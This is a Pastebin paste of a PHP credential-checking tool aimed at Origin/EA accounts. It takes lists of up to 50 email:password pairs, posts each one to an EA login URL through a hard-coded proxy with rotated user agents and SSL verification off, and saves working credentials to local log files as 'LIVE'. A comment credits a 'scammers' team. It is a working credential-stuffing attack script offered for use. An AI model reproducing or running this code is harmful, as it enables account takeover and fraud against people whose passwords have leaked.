Advertisement
Nojus741

Origin account checker

Nov 1st, 2016
10,595
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.02 KB | None | 0 0
  1. <html>
  2. <head>
  3.  
  4. <title>Origin & EA Login Checker | 4 Aymen Hmaidi lebhim :v</title>
  5. <style type="text/css">
  6. body{
  7. background-color: #000;
  8. font-family: courier new;
  9. font-size:12px;
  10. color:#ff0000;
  11. scrollbar-face-color: #ff0000;
  12. scrollbar-highlight-color: #000000;
  13. scrollbar-shadow-color: #000000;
  14. scrollbar-3dlight-color: #ff0000;
  15. scrollbar-arrow-color: #ff0000;
  16. scrollbar-track-color: #ff0000;
  17. scrollbar-darkshadow-color: #127990;
  18. }
  19. input,textarea{
  20. font-family: courier new;
  21. font-size:20px;
  22. color:#ff0000;
  23. background-color: #000000;
  24. border:1px solid #ff0000;
  25. }
  26. </style>
  27. </head>
  28. <body>
  29.  
  30. <center>
  31. <script src="http://www.compteur.org/compteur.php?165191"></script>
  32. <h2>Origin & EA Login Checker </h2><br>
  33. <p>
  34. <h1>delim ==> " : " MAX 50 E-mail:Pass</h1>
  35. <h2>Ken Tjik dima LIVE baddel el SOCKS : Ligne 102</h2><br>
  36. <form name="" method="post">
  37. <textarea name="logins" class="input" cols="50" rows="10"></textarea><br><h4>Copyright &copy; 2014 4 aymen hmaidi lebhim :3</h4><br>
  38. <input type="submit" value="Check!">
  39. </form>
  40.  
  41. <?php
  42. error_reporting(0);
  43. set_time_limit(0);
  44. if(isset($_POST['logins'])){
  45. $logins = trim($_POST['logins']);
  46. flush(); ob_flush();
  47. $logins = split("\n", $logins);
  48. $jum = count($logins);
  49. flush(); ob_flush();
  50. print "<hr><b>Checking ".$jum." Check now...<br>Please wait...</b><br>";
  51. flush(); ob_flush();
  52. for($x = 0; $x < $jum; $x++) {
  53. $logins = str_replace(" ", "", $logins);
  54. $logins = str_replace("\r", "", $logins);
  55. $logins = str_replace("\n", "", $logins);
  56. list($email, $password) = split(":", $logins[$x]);
  57. $num = $x + 1;
  58. print "<br>[".$num."] ".$email.":".$password." - ";
  59. flush(); ob_flush();
  60. if(file_exists("originkok.txt")) {
  61. unlink("originkok.txt");
  62. }
  63. $cek = CekLogin($email, $password);
  64. print $cek;
  65. }
  66. print "<hr><b>Done!</b>";
  67.  
  68. }
  69. function CekLogin($email,$passw) {
  70. $uas = array(1 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.16) Gecko/2010010414 Firefox/3.0.16 Flock/2.5.6",
  71. 2 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
  72. 3 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6",
  73. 4 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",
  74. 5 => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)");
  75. $ua = rand(1, count($uas));
  76. $ua = $uas[$ua];
  77. $ch = curl_init();
  78. curl_setopt($ch, CURLOPT_URL, "https://accounts.eamythic.com/
  79. ");
  80. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  81. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  82. curl_setopt($ch, CURLOPT_ENCODING, "");
  83. curl_setopt($ch, CURLOPT_COOKIEJAR, "originkok.txt");
  84. curl_setopt($ch, CURLOPT_USERAGENT, $ua);
  85. $chEx = curl_exec($ch);
  86. curl_close($ch);
  87. $ch = curl_init();
  88. curl_setopt($ch, CURLOPT_URL, "https://accounts.eamythic.com/");
  89. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  90. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  91. curl_setopt($ch, CURLOPT_POST, 1);
  92. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  93. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=$email&password=$passw&loginnucleus=Sign+In");
  94. curl_setopt($ch, CURLOPT_ENCODING, "");
  95. curl_setopt($ch, CURLOPT_COOKIEFILE, "originkok.txt");
  96. curl_setopt($ch, CURLOPT_COOKIEJAR, "originkok.txt");
  97. curl_setopt($ch, CURLOPT_USERAGENT, $ua);
  98. ////////////////////////#PROXY-SFARI#/////////////////////
  99. curl_setopt($ch, CURLOPT_PROXYUSERPWD, 'tstcheck:123456');
  100. curl_setopt($ch, CURLOPT_PROXY, "46.19.137.6:36673");
  101. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  102. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP); #<-----/ken Socks5 baddalha b CURLPROXY_SOCKS5
  103. ////////////////////////#PROXY#/////////////////////
  104. $chEx = curl_exec($ch);
  105. curl_close($ch);
  106. //////Tunisian-scammers-Team//////Preg-Match/////////
  107. if(preg_match("/Login with your EA or Mythic Master Account./", $chEx)) {
  108. print "<b><font color=#ff0000>die</font></b>";
  109. $file = fopen("originerror_log.txt","a+");
  110. fwrite($file,$email.":".$passw."\n");
  111. fclose($file);
  112. } elseif(preg_match("/Access Forbidden/", $chEx)) {
  113. print "<b><font color='#ff0000'>Access Forbidden!!</font></b>";
  114. $file = fopen("originsuc_log.txt","a+");
  115. fwrite($file,$email.":".$passw."\n");
  116. fclose($file);
  117. } else {
  118. print "<b><font color=blue>LIVE</font></b>";
  119. $file = fopen("origindown_log.txt","a+");
  120. fwrite($file,$email.":".$passw."\n");
  121. fclose($file);
  122. }
  123. }
  124. $ip = getenv("REMOTE_ADDR") ;
  125. Echo "Your IP is " . $ip;
  126. ?>
  127.  
  128. <h1>Origin - EA Account checker | MAX 50 mail:pass</h1>
  129. </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement